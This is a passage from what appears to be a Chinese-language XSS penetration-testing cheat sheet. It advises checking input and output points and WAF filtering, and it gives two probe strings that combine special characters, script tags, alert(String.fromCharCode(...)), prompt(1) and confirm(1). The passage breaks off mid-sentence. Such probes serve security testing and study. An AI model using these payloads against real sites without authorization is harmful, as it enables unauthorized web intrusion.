
XSS备忘录
0x00 渗透流程
观察输入输出点,测试waf过滤情况
简单: "'<script javascript onload src><a href></a>#$%^ 全面: '";!-=#$%^&{()}<script javascript data onload href src img input><a href></a>alert(String.fromCharCode(88,83,83));prompt(1);confirm(1)</script>
观察输入输出情况,一些特殊字符是否被编码、标签是否被过滤、输出...